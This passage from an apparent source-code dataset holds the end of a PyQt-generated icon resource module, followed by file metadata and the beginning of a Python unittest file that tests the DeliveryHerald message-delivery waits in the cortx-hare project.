\x8c\x44\x1b\x56\xa7\xa1\x1d\x99\x1b\x65\xd7\x3d\x79\xbb\xd0\x83\
\xc6\xfb\x88\x92\xba\xc9\x13\x62\x0b\xad\xb9\xe2\x46\x45\xa0\x65\
\x8b\xe6\xa2\xf5\xab\x7e\x44\x53\x13\xe3\x6c\xb1\x9f\xe6\xc7\x80\
\xa1\x1b\x8b\xc4\xfe\xaf\xd3\xe9\x5e\xe5\xf3\x6a\xc4\xf9\x02\xf7\
\xb3\x67\xcf\x90\xbb\xa4\xbd\xbd\x1d\x85\xea\x02\x09\xd7\xac\xa9\
\x93\x50\x65\x79\x59\x57\xe5\xdc\xbc\x81\x22\xc3\x42\xba\xb8\xb5\
\xec\x1d\xeb\x3e\xdf\x1b\x81\xb9\x8e\x6e\xf7\xb6\xb6\x36\xb7\xb1\
\x63\xc9\x58\xb3\x12\xfa\x31\x5a\x9b\xb6\xcc\xa2\xee\xe1\x73\xe2\
\xd8\x51\x74\x9b\x5f\x0d\x0b\xf2\xff\x50\x2e\x76\x10\x3e\xcf\x24\
\x9c\x7f\x06\xdf\xf6\xde\x24\x07\xf6\xec\xa6\xd9\x1b\x38\x6d\xc0\
\xc7\x72\xb2\x0b\xfc\x5a\xd6\x84\xbf\x23\x67\xe7\x36\xd1\x65\xbb\
\x5d\x77\x0b\x9d\x3f\x7b\x06\x9d\x3d\x73\x0a\x5d\xbb\x5a\x8d\x3a\
\x3a\x3a\x6c\xa6\x83\xf8\xa2\x0b\xe7\xd0\xdd\xfa\x7a\x49\xec\x4f\
\x9f\xb6\xa2\x51\x46\xae\x6b\x9e\x53\x07\x44\xc9\xcd\xee\x0c\x7f\
\x45\x59\x29\x9a\x99\x9c\xd8\x6d\x3e\x8a\x0e\xe7\xd0\x8e\xad\x9b\
\x50\x4b\xcb\x13\x8b\xf4\x3f\x6d\xc9\x10\xec\xc3\x39\x1d\x2a\x2f\
\xbd\x2c\x9a\x1f\xea\x96\x1a\xf3\x30\x97\xfb\x78\x9a\xff\xb7\x83\
\x07\x2c\xe6\x2a\x5b\x0a\xe3\xf5\xde\xdd\x3b\xe4\x99\xb4\x25\x0b\
\x89\x6d\x64\xe8\x60\x54\x7d\xa5\x52\x14\xff\xba\xf4\xe5\x54\xdb\
\xb3\xc9\xae\x60\x97\xc2\x7f\xa9\xb8\x48\x98\xa3\xac\xfd\x24\xf8\
\x26\x68\x5b\x3a\xfe\xbb\xe8\xe1\xc4\xc7\x35\xdc\xbb\x2b\xf8\x32\
\x6c\x83\x3e\x0d\x63\xc7\x91\x24\x27\x8c\x23\xcf\x0c\xd5\xa9\x3e\
\xf7\x34\x3f\x5d\x9e\x29\xe3\x63\xd1\xcd\xeb\xb5\xc4\x06\x7d\xde\
\xba\x0e\xbe\x4f\x4a\x44\xcf\x9f\x3f\x17\xec\xb7\x6e\x5c\xb7\x18\
\xcb\x53\x13\xe2\x04\xbf\x67\x4f\x62\x46\x84\x92\xf4\xe1\x1a\xcd\
\x1b\x9e\xe4\xbf\x51\x5b\x43\xca\x02\x9c\x8d\xf7\x1b\x7a\xb4\xd3\
\x9a\xff\x73\x36\x49\x53\x55\x51\x86\xc2\x87\x68\x88\x0d\xc6\x92\
\x3d\xa1\xfb\x1a\xe3\xa2\xb1\x2f\x96\xff\xd4\x89\xdf\x49\x59\x52\
\xe7\xce\xec\x66\x2f\xfc\x75\x9f\xc5\x18\xc7\x9f\x8d\x21\x41\xa8\
\xb6\xe6\x1a\x49\x77\x70\xff\x9e\xae\x79\x62\x5c\xb4\x5d\x7e\xba\
\x1e\x5d\xc5\x2e\x96\xff\x8f\x63\x47\x48\x59\xd2\x97\xa7\x76\xb3\
\xaf\x48\x5d\x40\xec\xe0\xb3\xe9\xb1\x92\x3a\x6f\x16\x49\x07\x7d\
\x7e\xcc\xf0\xae\x7e\x7d\xa7\xfe\xb6\x22\xf8\x61\xce\xa6\xe7\x77\
\x6b\x5f\x3f\x2e\x2a\x9c\xd8\x61\xed\x5a\x55\x59\x4e\xfa\x2f\x84\
\x57\xaf\x54\x91\xb4\x0b\xe7\xa4\x90\xb4\x65\x25\x3d\xfb\x43\x6f\
\xe2\x87\x79\x6c\x74\x84\x9e\x94\xe7\xe4\xb1\xa3\xc4\x06\xeb\x65\
\xcc\x1a\x36\xf8\x5b\xd4\xf6\xf4\xa9\x10\xbf\x6c\xd1\x3c\x92\x1e\
\xf6\x31\x58\x66\x4c\x9e\x40\xe2\xa1\x9e\x94\xc0\x0f\xb2\x3f\x3f\
\xcf\x62\x8c\xe3\x71\x0d\x73\x3b\x8e\x8f\x8f\x8d\x22\xe9\xab\xab\
\xba\xfa\x0c\xac\x19\x60\x4d\x70\xf7\x4e\x3d\x0a\x0b\x1e\x24\xc4\
\x0d\x83\xba\xb2\xb3\xd7\xf0\x36\x7e\xd8\x8b\xa4\x4c\x89\x27\x65\
\x8a\x0c\x0d\x41\x67\x4f\x9f\x42\x17\xcf\x9f\x25\x71\xa6\x19\x49\
\x16\xcf\xd0\x6d\xbd\x73\xeb\x66\xa1\x1f\xe0\xff\xaf\x48\x9d\xdf\
\xe3\x77\x79\x23\x3f\x88\xb0\x96\x89\x8e\xb0\x28\x1b\x3d\xf6\xd3\
\x97\x2d\xb6\x48\x7f\xfc\xe8\x61\x62\xc3\xed\x8e\xe7\x84\x9a\x6b\
\xd5\x8a\xe3\x07\x01\xdf\x9f\x14\x3f\xd6\xa6\xbf\x87\x75\xd1\xbe\
\x5f\x72\xd1\xb9\x33\x7f\xa2\xe2\xa2\xbf\x05\xbf\x41\x73\x63\xdd\
\xb4\x6e\x95\xc3\xef\xf1\x56\x7e\x10\x18\xb7\x90\x36\x62\xa8\xc6\
\x66\x3d\xd8\x53\x98\xff\x5b\x5b\x5b\x15\xcd\x8f\xe5\xbf\x87\x4d\
\xe8\x87\xf9\xb3\x45\xb3\x8f\x8d\x34\x92\x35\xf1\x8b\xc0\x0f\xb2\
\x3b\x27\x8b\x94\x73\x6e\x4a\x32\xda\xb2\x61\x8d\x50\x27\xf3\x66\
\x4e\x13\xf6\x7e\x99\x19\x6b\xd1\xf8\xd1\x23\xcc\x73\xde\x02\xd1\
\xf9\x2a\x85\x1f\xc6\x3b\x7e\x1e\xce\x37\x6d\x49\xf3\xa3\x47\xa8\
\xe4\x52\xb1\xc3\x3d\x8f\x12\xf9\x0b\xf6\xe5\x93\x72\x42\x5b\xcb\
\x25\xde\xc8\x5f\x7b\xed\xaa\xb0\x6f\xa3\x75\xe5\xd2\xc5\xa4\x9c\
\xf3\xf9\x3e\x7f\xfa\xe4\x09\x51\x5a\x72\xe9\x5f\xd1\xfc\x22\xb4\
\x85\xd3\xb0\xa5\x7a\xad\x6a\x35\xa7\x0e\xfc\xd2\x9a\xd1\xa0\xf5\
\xff\x02\x6c\x7c\xba\x12\x48\x8b\x9f\x81\xbb\x03\xb1\xfc\x4d\x0f\
\x1e\x20\xe3\x10\xb5\xe4\xf9\xde\x9e\x16\x5f\xbc\x20\x17\x3f\xad\
\x1d\xbc\xe6\x84\x84\xf8\xbd\x0e\x0a\x9f\xcd\x71\xb6\xd2\xee\x16\
\xcb\x0f\x7e\x1f\xd6\xf7\x72\xf2\xc3\xbe\xda\x05\xfc\x9d\xaa\x65\
\xcb\xf9\x3e\x51\x61\xb7\x9e\xd4\xec\x60\x29\xfd\x1f\xd6\x34\x9b\
\xd6\xa5\x0b\x77\x32\x58\xd3\x96\x2e\x22\x79\xc2\x7a\x60\xf9\xe2\
\x79\x0e\x15\xd6\xbe\x7b\xf3\x72\xec\xfa\x42\x39\xeb\xd9\xb6\xaa\
\x16\xca\x31\xff\xc1\x5a\x08\x9f\x89\xc2\xf8\xe8\xe9\x1c\x5c\xaa\
\xb8\x98\xff\xa4\xc9\x64\x7a\x49\x0e\x7e\x90\xf8\x98\x48\x92\x77\
\xfd\xed\x3a\xaf\xe7\x37\xe8\xd8\xaf\xe4\xf2\x7f\x20\xd0\xa7\x71\
\x1e\x62\xce\x76\x3d\xca\xaf\x66\x8f\xcb\xe9\xff\x41\xe0\x1c\x6b\
\xed\xca\xe5\xc2\x39\xa0\x5c\xe2\xb2\xb6\xd7\xaa\x26\x5b\xf0\x6b\
\x54\xb3\xb0\x2d\x6b\xdb\x66\xd9\xca\xdf\x1b\x81\x39\xc5\x55\xfc\
\x5c\x10\xfb\x99\x05\xbf\x5a\x35\x16\xdb\xe8\xb3\x4a\x4f\xca\x95\
\xca\x0a\x97\xf1\x1b\x83\x55\x6f\x5b\xac\x8d\x82\x54\x9f\x60\x1b\
\xf8\x77\x7b\x67\x72\xee\x12\x38\x63\x17\xc3\x02\x67\x2f\x30\xdf\
\xc0\x9c\x8b\xf7\x58\x8e\x14\xcf\xfb\x96\x63\x80\x3d\x86\xed\x70\
\xae\x75\xe8\xc0\x5e\xbb\x67\xd3\xae\x90\xd6\x96\x16\xe1\x3c\x78\
\xc1\xec\x19\xa2\xdb\x92\xbe\x43\xd9\xba\x71\xbd\xa8\x67\x6c\xed\
\x01\x38\xdd\x37\x9f\xf2\xb6\x87\xae\xea\x73\xae\x50\xb8\x4b\x7a\
\xdc\xdc\x4c\xf8\x53\xa6\x24\x38\xcd\x2f\xd4\x01\xbf\x6f\xe0\xed\
\x75\x9e\x64\x82\x73\x41\x63\x88\xb8\x3d\x06\x7d\x7e\x0a\x63\xc0\
\xfa\x6e\x56\x2a\xbf\x30\x17\xb0\x6c\x3f\xb3\x3f\x80\x7d\x52\xa3\
\xd4\xf2\xbb\x53\xff\xa1\xf6\x4e\xf0\xde\x81\xd8\xe7\xec\xf1\xcb\
\x29\xf4\xba\xc2\x91\xf6\xc6\xef\xc0\x7a\x9b\x3e\x83\x56\x22\x3f\
\xf8\x9d\xa6\x07\x8d\x4e\xf1\xc3\x9e\x4c\x4a\xbf\xf1\x46\x7e\xd0\
\xfc\xdc\x5d\x4e\xf1\xc3\x9d\xc3\x8b\xc0\x0f\xf7\xaa\xb4\xcc\x4c\
\x9e\x68\x33\x1d\xbc\x1f\x88\xe5\xc9\xe3\xc7\x92\xcf\xe0\xbd\x95\
\x1f\xb4\xf4\x72\xd7\x99\xd8\x91\x43\x05\x36\xd3\x1c\x2d\x2c\x70\
\x98\x46\xa9\xfc\xab\x57\x2c\x21\x6c\xcd\xcd\x8f\xba\x9d\xb7\x81\
\xcf\x87\x78\x47\x7d\x44\xa9\xfc\x11\x9c\x56\xe8\xd3\x58\xe8\xb3\
\x25\x50\x38\x6b\xc5\x22\xc5\xe7\x2b\x85\x1f\x94\x5e\xd3\x82\x8f\
\xa7\x6d\xf4\x79\x69\xf6\xf6\x4c\xc9\x79\x2b\x81\x7f\xfa\xa4\x09\
\x84\x11\xce\x07\x63\x46\x84\x09\xf1\xb1\x23\x87\x91\xf3\x42\xa9\
\x3e\x5f\x49\xfc\xa0\xf4\x3b\x53\x78\x6d\x07\xef\x0f\x60\x91\xea\
\xf3\x95\xc6\x4f\xdf\x23\xc1\x7b\x86\x10\x77\xf3\xc6\x75\xa7\x7d\
\xbe\xd2\xf8\xe1\x5d\x62\xfa\x3d\x78\xb8\x53\xed\x8d\xcf\x57\x1a\
\x3f\x28\x7d\x37\xd2\x4e\xd5\xc5\xe1\x82\xfd\x4e\xe7\xa9\x24\xfe\
\x05\xb3\xa6\x23\x5b\xe2\x8c\xcf\x57\x22\x3f\xdc\xa9\xc0\xfb\x46\
\xb4\x38\xeb\xf3\x95\xc8\x0f\x9a\x9b\xb5\xdd\x82\xdf\x59\x9f\xaf\
\x54\xfe\xf1\x63\x46\x92\xfb\xb4\xde\xf8\x7c\x8f\xf0\x53\xf7\x0a\
\xbd\xd1\xbc\xec\x1d\xc2\x6f\x09\x72\xb3\xb7\xf7\x3a\x2f\x5e\x9f\
\xb9\x8b\x9f\xd3\xa8\x22\xe5\xe0\x97\x59\xab\xdd\xc5\x3f\x24\x30\
\xb0\xbf\x5e\xc2\xef\x58\xdd\xa4\x4b\xdd\xc5\x0f\xd2\xf9\x3b\x65\
\x8f\x33\x63\xad\x35\xea\xfc\xde\x74\x27\x3f\xd3\xf9\x9b\x6a\xf8\
\x7d\xe1\x63\x0f\xb3\xff\xc5\x69\xd8\x0f\xdc\xcc\x4e\xc4\x10\x14\
\xf4\x16\xa7\x0e\x30\x9a\x7d\x42\xaa\xbb\x94\x5f\x2b\x24\x1a\xb4\
\xaa\x81\x8c\x9d\xdf\xcf\x60\xdf\xda\xc4\x30\x7d\x9a\x98\x87\xe8\
\x38\x9f\xb6\xa6\x33\xe4\x3f\x21\x64\x82\xb0\xaf\x39\xec\x67\x0e\
\xdf\x45\x9d\x7e\xc4\xd7\x2a\x9c\xe3\x25\x21\xd3\xef\x44\x67\xd8\
\x07\x63\xfa\x58\x85\xd8\xd0\xd7\x2a\xec\x67\x72\x10\x1e\x37\x87\
\x35\xe6\xb0\xd5\x1c\xf2\xab\x74\x2f\x09\x3b\x7a\x08\x85\xaa\xe1\
\x5b\x4e\x68\x42\xbe\xc5\x50\x0d\x34\xf0\xff\xf1\x64\xfe\xb2\
\x00\x00\x00\xba\
\x00\
\x00\x04\x7e\x78\x9c\x63\x60\x60\x04\x42\x01\x01\x06\x20\xa9\xc0\
\x90\xc1\xc2\xc0\x20\xc6\xc0\xc0\xa0\x01\xc4\x40\x21\xa0\x08\x44\
\x1c\x04\x0c\x58\x18\x70\x01\x41\x9c\x32\xc4\x81\x99\x40\x6c\x4c\
\x81\xfe\x55\x40\xfc\x19\x88\x6d\x29\xd0\xff\x0f\x6a\xc6\x2a\x22\
\xf0\x74\x20\x96\x43\xd3\xbf\x09\x88\xe7\x01\xf1\x6e\x22\xf0\x0b\
\x20\x9e\x84\xa6\x7f\x15\x89\xee\x5d\x85\x87\x0f\x03\xab\xa1\x98\
\x90\xfe\x95\x38\xd4\x51\xaa\xbf\x08\x8a\xc9\xd5\x8f\x0b\xd0\xcb\
\xfd\x16\x50\x4c\x48\xff\x12\x20\x3e\x0e\xc4\xa1\x44\x62\x90\xda\
\xa5\x48\xfa\x5d\x80\xf8\x09\x10\xff\x27\x12\x3f\x05\x62\x37\x2c\
\xee\xa2\x3b\xf8\x0f\x74\xcd\x7e\x20\x9e\x0f\xc4\x0d\xcc\x40\xcc\
\x08\x64\xff\x04\x66\x84\x4a\x08\x06\xb1\x61\x7c\x18\xfb\x00\x33\
\x44\x1f\x08\x03\x00\xa5\xbc\x58\x35\
"
qt_resource_name = b"\
\x00\x05\
\x00\x6f\xa6\x53\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x73\
\x00\x06\
\x07\x03\x7d\xc3\
\x00\x69\
\x00\x6d\x00\x61\x00\x67\x00\x65\x00\x73\
\x00\x09\
\x0b\x85\x9b\xdf\
\x00\x63\
\x00\x6c\x00\x65\x00\x61\x00\x72\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x0a\
\x0a\x92\x42\xff\
\x00\x79\
\x00\x6f\x00\x75\x00\x64\x00\x61\x00\x6f\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x08\
\x00\x4a\x42\xbf\
\x00\x62\
\x00\x69\x00\x6e\x00\x67\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x0a\
\x08\xab\xc2\xdf\
\x00\x75\
\x00\x70\x00\x64\x00\x61\x00\x74\x00\x65\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x0a\
\x0e\x2d\x83\x3f\
\x00\x67\
\x00\x6f\x00\x6f\x00\x67\x00\x6c\x00\x65\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x06\
\x04\x5c\x4f\x9f\
\x00\x41\
\x00\x49\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x08\
\x0a\x61\x42\x7f\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x09\
\x06\xc7\x80\xbf\
\x00\x61\
\x00\x62\x00\x6f\x00\x75\x00\x74\x00\x2e\x00\x69\x00\x63\x00\x6f\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x10\x00\x02\x00\x00\x00\x08\x00\x00\x00\x03\
\x00\x00\x00\x54\x00\x01\x00\x00\x00\x01\x00\x00\x05\x4f\
\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x01\x00\x00\x0c\x51\
\x00\x00\x00\xc6\x00\x01\x00\x00\x00\x01\x00\x00\x18\xd7\
\x00\x00\x00\x6a\x00\x01\x00\x00\x00\x01\x00\x00\x06\x9e\
\x00\x00\x00\xb0\x00\x01\x00\x00\x00\x01\x00\x00\x10\xd3\
\x00\x00\x00\x3a\x00\x01\x00\x00\x00\x01\x00\x00\x04\x82\
\x00\x00\x00\x22\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x84\x00\x00\x00\x00\x00\x01\x00\x00\x07\xcf\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x10\x00\x02\x00\x00\x00\x08\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x54\x00\x01\x00\x00\x00\x01\x00\x00\x05\x4f\
\x00\x00\x01\x72\x6f\x91\x50\x5f\
\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x01\x00\x00\x0c\x51\
\x00\x00\x01\x72\x6f\x97\xe0\x65\
\x00\x00\x00\xc6\x00\x01\x00\x00\x00\x01\x00\x00\x18\xd7\
\x00\x00\x01\x72\x7c\x9f\x28\xeb\
\x00\x00\x00\x6a\x00\x01\x00\x00\x00\x01\x00\x00\x06\x9e\
\x00\x00\x01\x72\x7a\x71\x32\x61\
\x00\x00\x00\xb0\x00\x01\x00\x00\x00\x01\x00\x00\x10\xd3\
\x00\x00\x01\x72\x6f\x83\xe0\x2b\
\x00\x00\x00\x3a\x00\x01\x00\x00\x00\x01\x00\x00\x04\x82\
\x00\x00\x01\x72\x6f\x8c\x29\xe3\
\x00\x00\x00\x22\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x73\x29\xe7\x60\xbf\
\x00\x00\x00\x84\x00\x00\x00\x00\x00\x01\x00\x00\x07\xcf\
\x00\x00\x01\x72\x6f\x93\x88\x0d\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 56.848881
| 103
| 0.725313
| 7,284
| 30,471
| 3.028968
| 0.042147
| 0.388886
| 0.492363
| 0.578706
| 0.428455
| 0.419209
| 0.400943
| 0.384762
| 0.373204
| 0.366269
| 0
| 0.34334
| 0.020446
| 30,471
| 535
| 104
| 56.95514
| 0.395839
| 0.004988
| 0
| 0.210019
| 0
| 0.843931
| 0.000033
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0.003854
| false
| 0
| 0.001927
| 0
| 0.00578
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 9904ceaf5f1ccf2c17130c62554748706ba26daf
| 16,623
| py
| Python
| hax/test/test_delivery_herald.py
| papan-singh/cortx-hare
| 4d6a533750dffe0b71c633a3707da79d9883b3dd
| ["Apache-2.0"]
| null
| null
| null
| hax/test/test_delivery_herald.py
| papan-singh/cortx-hare
| 4d6a533750dffe0b71c633a3707da79d9883b3dd
| ["Apache-2.0"]
| null
| null
| null
| hax/test/test_delivery_herald.py
| papan-singh/cortx-hare
| 4d6a533750dffe0b71c633a3707da79d9883b3dd
| ["Apache-2.0"]
| null
| null
| null
# Copyright (c) 2020 Seagate Technology LLC and/or its Affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For any questions about this software or licensing,
# please email opensource@seagate.com or cortx-questions@seagate.com.
#
# flake8: noqa
import logging
import sys
import unittest
from threading import Condition, Thread
from time import sleep, time
from hax.exception import NotDelivered
from hax.log import TRACE
from hax.motr.delivery import DeliveryHerald
from hax.types import HaLinkMessagePromise, MessageId
LOG = logging.getLogger('hax')
class CountDownLatch:
""" Home-made implementation of CountDownLatch from Java world.
Unblocks a single thread when all N threads have invoked count_down()
from their sides.
"""
def __init__(self, value: int):
self.lock = Condition()
self.value = value
def count_down(self):
with self.lock:
if self.value == 0:
raise RuntimeError("Already zero, nothing to count down")
self.value -= 1
if self.value == 0:
                self.lock.notify_all()
def waitfor(self):
while True:
with self.lock:
if not self.value:
return
self.lock.wait()
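# Illustrative sketch of how CountDownLatch is meant to be used: N worker
# threads each call count_down(), and the waiting thread is released only
# once the counter reaches zero. The helper name _latch_demo and its worker
# callable are hypothetical and exist only for illustration; the test classes
# below do not depend on them.
def _latch_demo(thread_count: int = 3) -> None:
    latch = CountDownLatch(thread_count)

    def worker():
        # Each worker signals completion exactly once.
        latch.count_down()

    workers = [Thread(target=worker) for _ in range(thread_count)]
    for w in workers:
        w.start()
    # Blocks until every worker has counted down, then returns.
    latch.waitfor()
    for w in workers:
        w.join()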
class TestDeliveryHeraldAny(unittest.TestCase):
"""
Tests wait_for_any() functionality.
"""
@classmethod
def setUpClass(cls):
# It seems like when unittest is invoked from setup.py,
# some default logging configuration is already applied;
        # invoking setup_logging() will make the log messages appear twice.
logging.addLevelName(TRACE, 'TRACE')
logging.getLogger('hax').setLevel(TRACE)
def test_it_works(self):
herald = DeliveryHerald()
notified_ok = True
def fn():
            nonlocal notified_ok
            try:
sleep(1.5)
herald.notify_delivered(MessageId(halink_ctx=100, tag=1))
except:
logging.exception('*** ERROR ***')
notified_ok = False
t = Thread(target=fn)
t.start()
m = MessageId
herald.wait_for_any(HaLinkMessagePromise(
[m(100, 1), m(100, 3), m(100, 4)]),
timeout_sec=10)
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_exception_raised_by_timeout(self):
herald = DeliveryHerald()
notified_ok = True
def fn():
            nonlocal notified_ok
            try:
sleep(1.5)
herald.notify_delivered(MessageId(halink_ctx=43, tag=3))
except:
logging.exception('*** ERROR ***')
notified_ok = False
t = Thread(target=fn)
t.start()
m = MessageId
try:
with self.assertRaises(NotDelivered):
herald.wait_for_any(HaLinkMessagePromise(
[m(42, 1), m(42, 3), m(42, 4)]),
timeout_sec=5)
finally:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_works_under_load(self):
herald = DeliveryHerald()
notified_ok = True
def fn(msg: MessageId):
            nonlocal notified_ok
            try:
sleep(1.5)
herald.notify_delivered(msg)
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i), ))
for i in range(1, 32)
]
for t in threads:
t.start()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
herald.wait_for_any(HaLinkMessagePromise(
[m(99), m(25), m(28), m(31)]),
timeout_sec=5)
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_if_delivered_earlier_than_awaited_wait_works(self):
herald = DeliveryHerald()
notified_ok = True
thread_count = 1
latch = CountDownLatch(thread_count)
def fn(msg: MessageId):
            nonlocal notified_ok
            try:
LOG.debug('Thread started')
herald.notify_delivered(msg)
LOG.debug('Notified delivery %s', msg)
latch.count_down()
LOG.debug('Main thread unblocked')
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i + 1), ))
for i in range(thread_count)
]
for t in threads:
t.start()
# Block until all the threads come to latch.count_down() and thus
# the message is notified for sure
latch.waitfor()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
herald.wait_for_any(HaLinkMessagePromise([m(1)]), timeout_sec=2)
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
self.assertEqual(0, len(herald.unsorted_deliveries.keys()))
def test_if_delivered_earlier_than_awaited_works_immediately(self):
herald = DeliveryHerald()
notified_ok = True
thread_count = 1
latch = CountDownLatch(thread_count)
def fn(msg: MessageId):
            nonlocal notified_ok
            try:
LOG.debug('Thread started')
herald.notify_delivered(msg)
LOG.debug('Notified delivery %s', msg)
latch.count_down()
LOG.debug('Main thread unblocked')
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i + 1), ))
for i in range(thread_count)
]
for t in threads:
t.start()
# Block until all the threads come to latch.count_down() and thus
# the message is notified for sure
latch.waitfor()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
started = time()
herald.wait_for_any(HaLinkMessagePromise([m(1)]), timeout_sec=5)
finished = time()
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
self.assertLess(
finished - started, 5,
'Awaiting thread was unblocked only by a timeout. It means '
'that unsorted_deliveries was analyzed too late.'
)
def test_if_delivered_earlier_than_awaited_wait_many(self):
herald = DeliveryHerald()
notified_ok = True
thread_count = 6
latch = CountDownLatch(thread_count)
def fn(msg: MessageId):
            nonlocal notified_ok
            try:
LOG.debug('Thread started')
herald.notify_delivered(msg)
LOG.debug('Notified delivery %s', msg)
latch.count_down()
LOG.debug('Main thread unblocked')
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i + 1), ))
for i in range(thread_count)
]
for t in threads:
t.start()
# Block until all the threads come to latch.count_down() and thus
# the message is notified for sure
latch.waitfor()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
herald.wait_for_any(HaLinkMessagePromise([m(1), m(5)]),
timeout_sec=2)
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
self.assertEqual(4, len(herald.unsorted_deliveries.keys()))
class TestDeliveryHeraldAll(unittest.TestCase):
"""
Tests wait_for_all() functionality.
"""
@classmethod
def setUpClass(cls):
logging.basicConfig(
level=logging.DEBUG,
stream=sys.stdout,
format='%(asctime)s {%(threadName)s} [%(levelname)s] %(message)s')
def test_it_works(self):
herald = DeliveryHerald()
notified_ok = True
def fn():
            nonlocal notified_ok
            try:
sleep(1.5)
herald.notify_delivered(MessageId(halink_ctx=100, tag=1))
except:
logging.exception('*** ERROR ***')
notified_ok = False
t = Thread(target=fn)
t.start()
m = MessageId
herald.wait_for_all(HaLinkMessagePromise([m(100, 1)]), timeout_sec=5)
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_exception_raised_if_not_all_delivered(self):
herald = DeliveryHerald()
notified_ok = True
def fn():
            nonlocal notified_ok
            try:
sleep(1.5)
herald.notify_delivered(MessageId(halink_ctx=42, tag=3))
except:
logging.exception('*** ERROR ***')
notified_ok = False
t = Thread(target=fn)
t.start()
m = MessageId
try:
with self.assertRaises(NotDelivered):
herald.wait_for_all(HaLinkMessagePromise([m(42, 1),
m(42, 3)]),
timeout_sec=5)
finally:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_works_if_all_messages_confirmed(self):
herald = DeliveryHerald()
notified_ok = True
def fn():
            nonlocal notified_ok
            try:
sleep(1.5)
herald.notify_delivered(MessageId(halink_ctx=42, tag=3))
herald.notify_delivered(MessageId(halink_ctx=42, tag=1))
except:
logging.exception('*** ERROR ***')
notified_ok = False
t = Thread(target=fn)
t.start()
m = MessageId
try:
herald.wait_for_all(HaLinkMessagePromise([m(42, 1),
m(42, 3)]),
timeout_sec=5)
finally:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_works_under_load(self):
herald = DeliveryHerald()
notified_ok = True
def fn(msg: MessageId):
            nonlocal notified_ok
            try:
sleep(1.5)
herald.notify_delivered(msg)
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i), ))
for i in range(1, 32)
]
for t in threads:
t.start()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
herald.wait_for_all(HaLinkMessagePromise(
[m(5), m(25), m(28), m(31)]),
timeout_sec=5)
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_if_delivered_earlier_than_awaited_wait_works(self):
herald = DeliveryHerald()
notified_ok = True
thread_count = 1
latch = CountDownLatch(thread_count)
def fn(msg: MessageId):
            nonlocal notified_ok
            try:
LOG.debug('Thread started')
herald.notify_delivered(msg)
LOG.debug('Notified delivery %s', msg)
latch.count_down()
LOG.debug('Main thread unblocked')
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
